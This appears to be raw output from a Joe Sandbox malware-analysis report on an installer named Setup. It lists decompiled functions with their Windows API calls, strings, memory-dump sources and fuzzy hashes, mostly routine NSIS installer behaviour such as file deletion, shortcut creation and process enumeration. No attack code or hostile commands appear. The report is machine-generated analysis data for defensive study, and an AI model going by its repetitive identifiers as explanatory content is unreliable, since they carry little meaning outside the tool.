                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                                                                                                • API String ID: 3347642858-1086125096
                                                                                                                                                                                                                                                                • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                                                                                                                                Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                                                                                                                                Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                                                                                Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$N$open
                                                                                                                                                                                                                                                                • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
